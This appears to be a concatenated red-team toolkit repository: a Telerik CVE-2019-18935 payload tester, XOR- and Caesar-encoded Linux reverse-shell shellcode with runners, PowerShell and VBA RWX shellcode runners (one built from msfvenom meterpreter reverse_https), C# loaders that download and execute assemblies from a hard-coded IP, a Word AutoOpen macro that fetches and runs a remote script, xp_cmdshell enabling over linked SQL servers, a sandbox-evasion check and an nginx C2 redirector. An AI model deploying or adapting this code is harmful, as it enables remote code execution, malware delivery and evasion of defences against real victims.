6 | // can be used to test mixed mode assembly payloads for the Telerik UI RCE (https://github.com/noperator/CVE-2019-18935)
7 | // usage: .\TestAssemblyInstaller.exe payloads\reverse-shell-2021040215111429-amd64.dll
8 |
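namespace TestAssemblyInstaller
{
    /// <summary>
    /// Loads a mixed-mode assembly through System.Configuration.Install.AssemblyInstaller, the same
    /// code path the Telerik UI deserialisation RCE (CVE-2019-18935) ends up in, so a payload DLL can
    /// be tested locally before use. Native code in the DLL runs at load time, inside this process.
    /// </summary>
    class Program
    {
        static void Main(string[] args)
        {
            // The original indexed args[0] unguarded and crashed with IndexOutOfRangeException when run bare.
            if (args.Length < 1 || string.IsNullOrWhiteSpace(args[0]))
            {
                Console.Error.WriteLine("usage: TestAssemblyInstaller.exe <path-to-assembly.dll>");
                return;
            }

            string path = args[0];
            string[] commandLineOptions = new string[0];

            using (var installer = new AssemblyInstaller(path, commandLineOptions))
            {
                // Load the assembly in a fresh installer context rather than the default one.
                installer.UseNewContext = true;
                // Null state dictionaries, as in the original. Any Installer-derived types in the
                // payload run here; a missing file or load failure propagates as an unhandled exception.
                installer.Install(null);
                installer.Commit(null);
            }
        }
    }
}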
27 |
--------------------------------------------------------------------------------
/c/ScXorEncoder.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
// Plaintext shellcode to XOR-encode. Byte-for-byte the buffer executed by c/ScRunner.c; the encoded
// output is what c/ScRunnerXor.c carries. Keep the three files in sync when regenerating the payload.
unsigned char buf[] =
"\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a"
"\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
"\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x00\x50\xc0\xa8"
"\x31\x53\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59"
"\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a"
"\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48"
"\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e"
"\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6";
15 |
16 | int main (int argc, char **argv)
17 | {
18 | char xor_key = 'J';
19 | int payload_length = (int) sizeof(buf);
20 |
21 | for (int i=0; i
2 | #include
3 | #include
4 |
5 | // compile
6 | // gcc -o ScRunner.out ScRunner.c -z execstack
7 |
8 |
9 | int main (int argc, char **argv)
10 | {
11 | unsigned char buf[] = "\x02\x7B\xB5\x20\x43\x12\xD3\xFC\x5A\x02\xC3\x9C\x07\x7B\x83\x20\x68\x0B\x10\xF8\x4D\x45\x4F\x02\xCF\x8A\x32\x1B\x20\x40\x0B\x13\x1A\x20\x63\x12\xD3\x20\x48\x15\x20\x4B\x14\x45\x4F\x02\xCF\x8A\x32\x71\x02\xDD\x02\xF3\x48\x4A\x4A\x1A\x8A\xE2\x7B\x19\x1B\x02\xC3\xAC\x20\x5A\x10\x20\x60\x12\x45\x4F\x13\x02\xCF\x8A\x33\x6F\x03\xB5\x83\x3E\x52\x1D\x20\x69\x12\x20\x4A\x20\x4F\x02\xC3\xAD\x02\x7B\xBC\x45\x4F\x13\x13\x15\x02\xCF\x8A\x33\x8D\x20\x76\x12\x20\x4B\x15\x45\x4F\x14\x20\x34\x10\x45\x4F\x02\xCF\x8A\x32\xA7\xB5\xAC\x4A";
12 |
13 | char xor_key = 'J';
14 | int arraysize = (int) sizeof(buf);
15 | for (int i=0; i dt): Loop
17 | objFSO.DeleteFile p
18 |
--------------------------------------------------------------------------------
/c/ScCaesarEncoder.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | int main (int argc, char **argv)
6 | {
7 | unsigned char buf[] =
8 | "\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
9 | "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a"
10 | "\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
11 | "\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x1f\x90\xc0\xa8"
12 | "\x31\x53\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59"
13 | "\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a"
14 | "\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48"
15 | "\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e"
16 | "\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6";
17 | int buflen = (int) sizeof(buf);
18 |
19 | printf("buflen: %d\n", buflen);
20 |
21 | printf("Encoded: ");
22 | for (int i=0; i] SharpResolver.exe ");
13 | return;
14 | }
15 |
16 | string iLib = args[0];
17 | string iFun = args[1];
18 |
19 | IntPtr loadlib = GetProcAddress(LoadLibrary(iLib), iFun);
20 |
21 | Console.WriteLine("[>] Resolving: " + iLib + "!" + iFun);
22 | Console.WriteLine(string.Format("[>] Address: 0x{0:X}", loadlib.ToInt32()));
23 | }
        // LoadLibrary maps the DLL if it is not already loaded, so resolving an export has the side
        // effect of running that DLL's DllMain. Declared without CharSet/SetLastError, unlike GetProcAddress below.
        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string name);
        // NOTE(review): the address is printed above with ToInt32(), which throws OverflowException for
        // 64-bit addresses above 2^31; ToInt64() is needed when this runs as an x64 process.
        [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
        static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/psh/ReflectiveScRunnerLookup.ps1:
--------------------------------------------------------------------------------
# Classic in-process shellcode runner: P/Invoke VirtualAlloc/CreateThread/WaitForSingleObject via an
# Add-Type C# wrapper, copy the bytes into an RWX page and run them on a new thread.
# Add-Type compiles the wrapper with csc, which on Windows PowerShell typically writes a temporary
# assembly under %TEMP% — this is not a purely in-memory technique.
$Kernel32 = @"
using System;
using System.Runtime.InteropServices;

public class Kernel32 {
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32", CharSet=CharSet.Ansi)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@

Add-Type $Kernel32

# Placeholder: paste the full byte array here (e.g. msfvenom -f ps1 output).
[Byte[]] $buf = 0xfc,[...],0xd5

$size = $buf.Length

# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: a single RWX allocation, which is an easy
# memory-scanner indicator. Return value (NULL on failure) is not checked.
[IntPtr]$addr = [Kernel32]::VirtualAlloc(0,$size,0x3000,0x40);

[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size)

$thandle = [Kernel32]::CreateThread(0,0,$addr,0,0,0);

# 0xFFFFFFFF = INFINITE: block this PowerShell until the shellcode thread exits.
# ($tHandle and $thandle are the same variable; PowerShell identifiers are case-insensitive.)
[Kernel32]::WaitForSingleObject($tHandle, [uint32]"0xFFFFFFFF")
--------------------------------------------------------------------------------
/msbuild/WorflowCompilerXmlGenerator.ps1:
--------------------------------------------------------------------------------
# Generate the XML input file for Microsoft.Workflow.Compiler.exe by calling the compiler's own private
# SerializeInputToWrapper helper through reflection (so the serialised format is always the one the
# binary expects), then move it to $output and make it writable by the "student" account.
$workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"

$workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe)

# Non-public static method on CompilerWrapper; it writes a temp file and returns its path.
$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')

Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll'

$compilerparam = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters

# Compile in memory: no output assembly is written by the workflow compiler.
$compilerparam.GenerateInMemory = $True

# $pathvar is the source file the compiler will be pointed at (name is arbitrary; the .cs goes in it later).
$pathvar = "test.txt"
$output = "C:\Tools\run.xml"

$tmp = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $compilerparam, [String[]] @(,$pathvar)))

Move-Item $tmp $output

# Grant "student" FullControl on run.xml (no inheritance/propagation flags). The line uses typographic
# quotes (U+201C/U+201D) around the first four arguments; PowerShell tolerates them, plain " is safer.
$Acl = Get-ACL $output;$AccessRule= New-Object System.Security.AccessControl.FileSystemAccessRule(“student”,”FullControl”,”none”,”none","Allow");$Acl.AddAccessRule($AccessRule);Set-Acl $output $Acl
--------------------------------------------------------------------------------
/psh/SqlCmd.ps1:
--------------------------------------------------------------------------------
# Enable xp_cmdshell on a linked SQL Server ($Link) by going through $Target, then run $Command there.
# Every statement is wrapped in OPENQUERY so it executes on the linked server, not on $Target.
# Integrated Security=True: the connection authenticates as the current Windows user.
$Target = "tar.dom.local"
$Link = "SQL01"
$Command = "calc.exe"

$sqlConnection = New-Object System.Data.SqlClient.SqlConnection
$sqlConnection.ConnectionString = "Server=$Target;Database=master;Integrated Security=True"
$sqlConnection.Open()
$sqlCmd = New-Object System.Data.SqlClient.SqlCommand
$sqlCmd.Connection = $sqlConnection

# Execute one statement on the shared command object and hand back the open reader (caller closes it).
function Invoke-LinkedStatement([string]$Text) {
    $sqlCmd.CommandText = $Text
    return $sqlCmd.ExecuteReader()
}

# Step 1 enables advanced options, step 2 enables xp_cmdshell. Both are server-level configuration
# changes on the linked server and are left enabled afterwards.
$setupStatements = @(
    ('SELECT 1 FROM openquery("{0}",''SELECT 1; EXEC sp_configure ''''show advanced options'''', 1; RECONFIGURE;'')' -f $Link),
    ('SELECT 1 FROM openquery("{0}",''SELECT 1;EXEC sp_configure ''''xp_cmdshell'''', 1; RECONFIGURE;'')' -f $Link)
)
foreach ($statement in $setupStatements) {
    (Invoke-LinkedStatement $statement).Close()
}

# Step 3: run the command and echo each output row. $Command is spliced into the SQL text verbatim
# (there is no parameterisation inside OPENQUERY); a single quote in it breaks the statement.
$reader = Invoke-LinkedStatement ('SELECT 1 FROM openquery("{0}",''SELECT 1;EXEC xp_cmdshell ''''{1}'''';'')' -f $Link,$Command)
while ($reader.Read()){
    $reader[0]
}
$reader.Close()
$sqlConnection.Close()
26 |
--------------------------------------------------------------------------------
/csharp/SharpHttpFetch.cs:
--------------------------------------------------------------------------------
1 | // base64 -w 0 payload.bin > /var/www/html/robots.txt
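/// <summary>
/// Download a base64 text blob from <paramref name="url"/> and return the decoded bytes.
/// On any failure the error is written to stderr and a one-byte buffer { 0xC3 } (x86 RET) is
/// returned, so a caller that jumps into the result returns immediately instead of crashing.
/// Only base64 decoding happens here; if the blob is also gzip-compressed (see GzipBuffer.cs)
/// inflating it is the caller's job.
/// </summary>
/// <param name="url">HTTP(S) URL serving the base64 payload (see the base64 -w 0 note above).</param>
/// <returns>Decoded payload bytes, or { 0xC3 } on error.</returns>
public static byte[] GetShellcode(string url)
{
    try
    {
        // 3072 == SecurityProtocolType.Tls12; the numeric cast keeps this compiling on frameworks
        // whose enum predates the named member.
        ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
        // Process-wide: every HTTPS connection this process makes afterwards skips certificate
        // validation, not just this one. Meant for self-signed staging hosts; if the process makes
        // other TLS connections, narrow this (e.g. accept only the expected certificate thumbprint).
        ServicePointManager.ServerCertificateValidationCallback = delegate { return true; };

        // WebClient is IDisposable; the original never released it.
        using (WebClient client = new WebClient())
        {
            // Browser-like User-Agent; WebClient sends none by default, which stands out in proxy logs.
            client.Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
            // Honour the system proxy with the current user's credentials so egress works on proxied networks.
            client.Proxy = WebRequest.GetSystemWebProxy();
            client.Proxy.Credentials = CredentialCache.DefaultCredentials;
            string base64Text = client.DownloadString(url);
            return Convert.FromBase64String(base64Text);
        }
    }
    catch (Exception e)
    {
        Console.Error.WriteLine(e.Message + Environment.NewLine + e.StackTrace);
        // 0xC3 = RET: a harmless fallback if the caller executes the buffer anyway.
        var ret = new byte[] { 0xC3 };
        return ret;
    }
}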
--------------------------------------------------------------------------------
/csharp/GzipBuffer.cs:
--------------------------------------------------------------------------------
using System;
using System.IO;
using System.IO.Compression;
2 |
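namespace PoCBinZip
{
    /// <summary>
    /// GZip round-trip helpers for embedding a compressed payload and inflating it at run time.
    /// </summary>
    class Program
    {
        static void Main(string[] args)
        {
            // compressedSC (a byte[] holding the gzip'd payload) is expected to be defined elsewhere;
            // it is not part of this file.
            byte[] buf = Decompress(compressedSC);

            return;
        }

        /// <summary>GZip-compress <paramref name="data"/> and return the compressed bytes.</summary>
        /// <param name="data">Raw bytes; an empty array yields a valid (header-only) gzip stream.</param>
        /// <exception cref="ArgumentNullException">data is null.</exception>
        public static byte[] Compress(byte[] data)
        {
            if (data == null)
            {
                throw new ArgumentNullException("data");
            }

            using (var compressedStream = new MemoryStream())
            {
                // leaveOpen = false: disposing the GZipStream writes the gzip trailer and closes the
                // MemoryStream; ToArray() is still valid on a closed MemoryStream.
                using (var gzipStream = new GZipStream(compressedStream, CompressionMode.Compress, false))
                {
                    gzipStream.Write(data, 0, data.Length);
                }

                return compressedStream.ToArray();
            }
        }

        /// <summary>Inflate a GZip byte buffer such as the one produced by <see cref="Compress"/>.</summary>
        /// <param name="compressedData">Complete gzip stream.</param>
        /// <exception cref="ArgumentNullException">compressedData is null.</exception>
        /// <exception cref="InvalidDataException">the buffer is not a valid gzip stream.</exception>
        public static byte[] Decompress(byte[] compressedData)
        {
            if (compressedData == null)
            {
                throw new ArgumentNullException("compressedData");
            }

            // The original leaked the input/output MemoryStreams; all three streams are now disposed.
            using (var uncompressedStream = new MemoryStream())
            using (var compressedStream = new MemoryStream(compressedData))
            using (var gzipStream = new GZipStream(compressedStream, CompressionMode.Decompress))
            {
                gzipStream.CopyTo(uncompressedStream);
                return uncompressedStream.ToArray();
            }
        }
    }
}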
--------------------------------------------------------------------------------
/wsh/DownloadAlt.vb:
--------------------------------------------------------------------------------
' Busy-waits for n seconds while pumping the message queue (DoEvents) so Word
' stays responsive. Resolution is one second (Now has no sub-second part).
' n <= 0 returns after a single DoEvents.
Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub
8 |
' Launches the dropped JScript with cscript.exe via WScript.Shell.Run.
' VBA does not treat backslash as an escape, so the literal really contains
' doubled backslashes; Windows path parsing tolerates them. With Run's default
' (no wait) the return value is 0 immediately and is discarded here.
' C:\Windows\Tasks is writable by standard users, which is why it is used as
' the drop location.
Sub Execute()
    Dim ret
    Dim o
    Set ret = VBA.CreateObject("WScript.Shell")
    o = ret.Run("cscript c:\\windows\\tasks\\main.js")
End Sub
15 |
' Stage 1 of the macro: download main.js over plain HTTP, write it to
' C:\Windows\Tasks and hand it to Execute.
' Review notes:
'  - No Option Explicit: filepath, URL, xhr, fso and stream are implicit Variants.
'  - Msxml2.ServerXMLHTTP ignores the user's WinINet proxy settings, so this
'    fails behind an authenticated corporate proxy where MSXML2.XMLHTTP would work.
'  - The fetch is plaintext and unauthenticated; anything on the path can swap
'    the script for its own, and it then runs as this user. No hash check is done.
'  - The 2-second Wait after a synchronous .Send is presumably a crude sandbox
'    delay; the request has already completed by then.
'  - Disk artefacts: the file is left behind after execution.
Sub RemoteFetch()
    filepath = "c:\\windows\\tasks\\main.js"
    URL = "http://g.somesec.xyz/js/main.js"

    Set xhr = CreateObject("Msxml2.ServerXMLHTTP.6.0")
    With xhr
        .Open "GET", URL, False
        .Send
    End With
    Wait (2)
    If xhr.Status = 200 Then
        Set fso = CreateObject("Scripting.FileSystemObject")
        ' Overwrite any previous drop; DeleteFile raises on a read-only file.
        If fso.FileExists(filepath) Then fso.DeleteFile (filepath)

        ' ADODB.Stream in binary mode (Type = 1) writes ResponseBody byte-for-byte.
        Set stream = CreateObject("ADODB.Stream")
        stream.Open
        stream.Type = 1
        stream.Write (xhr.ResponseBody)
        stream.Position = 0
        stream.SaveToFile (filepath)
        stream.Close

        Execute
    End If
End Sub
41 |
' Legacy auto-macro: Word runs AutoOpen when the document is opened with
' macros enabled. Entry point of the whole chain.
Sub AutoOpen()
    RemoteFetch
End Sub
--------------------------------------------------------------------------------
/msbuild/WorkflowCompiler-Reflective-PE-Runner.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Reflection;
4 | using System.Text;
5 | using System.Threading;
6 | using System.Workflow.ComponentModel;
7 |
/// <summary>
/// Workflow Activity whose constructor fetches a base64 .NET assembly over
/// HTTP, loads it from memory and runs its entry point. Putting the logic in
/// the constructor means merely instantiating the Activity (as a workflow
/// compiler/host does) is enough to trigger it — presumably why this shape
/// was chosen; verify against the intended host.
/// </summary>
public class Run : Activity{
    public Run() {
        // NOTE(review): visible marker on stdout; drop it outside of testing.
        Console.WriteLine("I executed!");

        // Plain HTTP to a hard-coded IP with no integrity check: anyone on the
        // path can substitute their own assembly and it runs as this user.
        byte[] bytes = GetShellcode("http://192.168.49.83/main");

        // Load from a byte array (no on-disk Location). Assembly.Load throws
        // BadImageFormatException if the blob is not a managed PE.
        var assembly = Assembly.Load(bytes);
        MethodInfo method = assembly.EntryPoint;
        if (method != null)
        {
            // Passes an empty string[]; an entry point declared without
            // parameters makes Invoke throw TargetParameterCountException.
            method.Invoke(null, new object[] { new string[] { } });
        }
    }
    /// <summary>Downloads <paramref name="url"/> as text and base64-decodes it.</summary>
    /// <param name="url">URL serving the base64 payload.</param>
    /// <returns>Decoded bytes. Despite the local variable's name nothing is decompressed here.</returns>
    /// <exception cref="WebException">Network or HTTP error.</exception>
    /// <exception cref="FormatException">Body is not valid base64.</exception>
    public static byte[] GetShellcode(string url)
    {
        // NOTE(review): WebClient is IDisposable and is never disposed.
        WebClient client = new WebClient();
        // No user-agent is set; the default WebClient request has none.
        // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
        // Honour the system proxy and let it authenticate the current Windows
        // identity (DefaultCredentials) if it challenges.
        client.Proxy = WebRequest.GetSystemWebProxy();
        client.Proxy.Credentials = CredentialCache.DefaultCredentials;
        string compressedEncodedShellcode = client.DownloadString(url);
        return Convert.FromBase64String(compressedEncodedShellcode);
    }
}
--------------------------------------------------------------------------------
/csharp/Reflective-Dll-Runner.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Reflection;
4 | using System.Text;
5 |
6 | namespace test
7 | {
/// <summary>
/// Fetches a base64-encoded managed DLL over HTTP, loads it from memory into
/// this process and calls ManagedClass.Class1.runner() by reflection. Nothing
/// is written to disk.
/// </summary>
class Program
{
    static void Main(string[] args)
    {
        // Plain HTTP to a hard-coded IP with no integrity check: anyone on the
        // path can replace the assembly and it runs with this user's rights.
        byte[] dll = GetShellcode("http://192.168.49.83/main");

        // Load from a byte array; throws BadImageFormatException for a non-managed blob.
        Assembly SampleAssembly = Assembly.Load(dll);

        // Both lookups return null when the name is absent, so a mismatched
        // payload surfaces as NullReferenceException on the following lines.
        Type t = SampleAssembly.GetType("ManagedClass.Class1");

        var staticMethod = t.GetMethod("runner");

        // Null target + null args: runner must be static and parameterless.
        staticMethod.Invoke(null, null);
    }
    /// <summary>Downloads <paramref name="url"/> as text and base64-decodes it.</summary>
    /// <param name="url">URL serving the base64 payload.</param>
    /// <returns>Decoded bytes. Despite the local variable's name nothing is decompressed here.</returns>
    /// <exception cref="WebException">Network or HTTP error.</exception>
    /// <exception cref="FormatException">Body is not valid base64.</exception>
    public static byte[] GetShellcode(string url)
    {
        // NOTE(review): WebClient is IDisposable and is never disposed.
        WebClient client = new WebClient();
        // No user-agent is set; the default WebClient request has none.
        // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
        // Honour the system proxy and let it authenticate the current Windows
        // identity (DefaultCredentials) if it challenges.
        client.Proxy = WebRequest.GetSystemWebProxy();
        client.Proxy.Credentials = CredentialCache.DefaultCredentials;
        string compressedEncodedShellcode = client.DownloadString(url);
        return Convert.FromBase64String(compressedEncodedShellcode);
    }
}
33 | }
34 |
--------------------------------------------------------------------------------
/csharp/Reflective-PE-Runner.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Reflection;
4 | using System.Text;
5 | using System.Threading;
6 |
7 | namespace test
8 | {
/// <summary>
/// Fetches a base64-encoded managed executable over HTTP, loads it from memory
/// and invokes its entry point in this process. Nothing is written to disk.
/// </summary>
class Program
{
    static void Main(string[] args)
    {
        // Plain HTTP to a hard-coded IP with no integrity check: anyone on the
        // path can substitute their own assembly and it runs as this user.
        byte[] bytes = GetShellcode("http://192.168.49.83/main");

        // Load from a byte array; throws BadImageFormatException for a non-managed blob.
        var assembly = Assembly.Load(bytes);
        // EntryPoint is null for a class library, in which case nothing runs.
        MethodInfo method = assembly.EntryPoint;
        if (method != null)
        {
            // Passes an empty string[]; an entry point declared without
            // parameters makes Invoke throw TargetParameterCountException.
            method.Invoke(null, new object[] { new string[] { } });
        }
    }
    /// <summary>Downloads <paramref name="url"/> as text and base64-decodes it.</summary>
    /// <param name="url">URL serving the base64 payload.</param>
    /// <returns>Decoded bytes. Despite the local variable's name nothing is decompressed here.</returns>
    /// <exception cref="WebException">Network or HTTP error.</exception>
    /// <exception cref="FormatException">Body is not valid base64.</exception>
    public static byte[] GetShellcode(string url)
    {
        // NOTE(review): WebClient is IDisposable and is never disposed.
        WebClient client = new WebClient();
        // No user-agent is set; the default WebClient request has none.
        // Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36");
        // Honour the system proxy and let it authenticate the current Windows
        // identity (DefaultCredentials) if it challenges.
        client.Proxy = WebRequest.GetSystemWebProxy();
        client.Proxy.Credentials = CredentialCache.DefaultCredentials;
        string compressedEncodedShellcode = client.DownloadString(url);
        return Convert.FromBase64String(compressedEncodedShellcode);
    }
}
33 | }
34 |
--------------------------------------------------------------------------------
/wsh/InMemoryWin32CreateThread.vb:
--------------------------------------------------------------------------------
' Win32 imports (PtrSafe/LongPtr => 64-bit Office). ThreadParameter is passed
' ByRef (the VBA default), so the literal 0 below becomes a pointer to a
' temporary rather than a NULL parameter — harmless here because the shellcode
' ignores its argument.
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr

' VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr

' RtlMoveMemory(dst, ByRef src, length) — src As Any lets a Long be passed by address.
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
6 |
' In-process shellcode runner: copies a byte array into freshly allocated RWX
' memory inside the Office process and starts a thread on it.
' VirtualAlloc(PAGE_EXECUTE_READWRITE) followed by CreateThread from a macro is
' the textbook pattern macro/EDR heuristics commonly flag.
Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long

    ' Generator command for the array (bytes redacted as [...] in this listing):
    ' msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.83 LPORT=443 EXITFUNC=thread -f vbapplication
    buf = Array(232,[...],213)

    ' NOTE(review): UBound(buf) is the last index, so this requests one byte
    ' fewer than the array holds while the loop writes UBound+1 bytes. It only
    ' works because VirtualAlloc rounds the size up to a whole page.
    ' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)

    ' Byte-at-a-time copy: data is a 4-byte Long and RtlMoveMemory copies only
    ' its low byte (little-endian), i.e. the shellcode byte.
    For counter = LBound(buf) To Ubound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter

    ' Thread handle and id are discarded; the macro returns while the payload
    ' keeps running in the background of the host process.
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
26 |
' ThisDocument event handler. Both this and AutoOpen call MyMacro; if Word
' fires both for the same open, the shellcode is started twice.
Sub Document_Open()
    MyMacro
End Sub
30 |
' Legacy auto-macro entry point (runs when the document opens with macros
' enabled). See Document_Open for the double-trigger caveat.
Sub AutoOpen()
    MyMacro
End Sub
34 |
--------------------------------------------------------------------------------
/csharp/Guardrail-MininumBrowsersChecker.cs:
--------------------------------------------------------------------------------
1 | /*
2 | Minimum number of browsers, C#
3 | Module written by Brandon Arvanaghi
4 | Website: arvanaghi.com
5 | Twitter: @arvanaghi
6 |
7 | modified: @thelikes_
8 | */
9 |
10 | using System;
11 | using Microsoft.Win32;
12 |
13 | namespace MinimumNumBrowsersChecker
14 | {
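/// <summary>
/// Sandbox guardrail: reports whether at least <c>num</c> of three well-known
/// browser registry keys (Chrome, Internet Explorer, Mozilla) exist under
/// HKLM. Analysis VMs are often bare; real workstations rarely are.
/// </summary>
class Program
{
    /// <summary>
    /// Counts the probed browser keys that exist and compares with <paramref name="num"/>.
    /// </summary>
    /// <param name="num">Minimum number of browsers required; 0 or less always passes.</param>
    /// <returns>
    /// true when the count is at least <paramref name="num"/> ("Proceed!" is printed);
    /// otherwise false and the count is printed. At most 3 keys are probed, so any
    /// <paramref name="num"/> above 3 can never pass.
    /// </returns>
    /// <remarks>
    /// A 32-bit process on 64-bit Windows may see these HKLM paths through the
    /// WOW6432Node view, where a 64-bit browser's entry is not necessarily present,
    /// so a 32-bit build can under-count on a real machine — verify for the target
    /// build, and use RegistryView.Registry64 if that matters. Keys are opened
    /// read-only and disposed (the original leaked the handles).
    /// </remarks>
    public static bool Check(int num)
    {
        int browserCount = 0;
        string[] browserKeys = { @"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe", @"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe", @"SOFTWARE\Mozilla" };

        foreach (string browserKey in browserKeys)
        {
            // OpenSubKey returns null (rather than throwing) for a missing key;
            // `using` on a null reference is a no-op.
            using (RegistryKey openedKey = Registry.LocalMachine.OpenSubKey(browserKey, false))
            {
                if (openedKey != null)
                {
                    browserCount += 1;
                }
            }
        }

        if (browserCount >= num)
        {
            Console.WriteLine("Proceed!");
            return true;
        }

        Console.WriteLine("Number of Browsers: {0}", browserCount);
        return false;
    }
}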
43 | }
--------------------------------------------------------------------------------
/conf/nginx-redirector.conf:
--------------------------------------------------------------------------------
1 | # Hide nginx version
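# Hide nginx version in Server header and error pages
server_tokens off;

# HTTPS redirector in front of a C2: only /dashboard and /api are proxied,
# everything else is served from the (normally empty) document root.
server {
    listen 443 ssl;
    server_name attacker.com;

    root /var/www/html;

    # Strip headers that fingerprint the backend. These directives need the
    # headers-more module (ngx_http_headers_more_filter_module); without it
    # nginx refuses to start. X-AspNet-Version was listed in the original
    # comment but never cleared.
    more_clear_headers 'Server';
    more_clear_headers 'X-Powered-By';
    more_clear_headers 'X-AspNet-Version';

    ssl_certificate /etc/letsencrypt/live/attacker.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/attacker.com/privkey.pem;

    # TLS session settings
    ssl_session_timeout 1d;
    ssl_session_cache shared:SSL:50m;
    ssl_session_tickets off;

    # Modern TLS configuration (TLS 1.2+, AEAD suites only, client preference)
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305;
    ssl_prefer_server_ciphers off;

    # Disable directory listing. Note that any file placed under root is still
    # served to unauthenticated clients; keep the root empty or add a default
    # location that returns 404/redirects.
    autoindex off;

    # Operator dashboard: proxied over TLS to the C2 host.
    # No Host header is forwarded; add proxy_set_header Host if the backend
    # routes on it.
    location /dashboard {
        proxy_pass https://c2.attacker.com:31433 ;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    }

    # Implant traffic. This upstream is plain HTTP, so the redirector-to-C2
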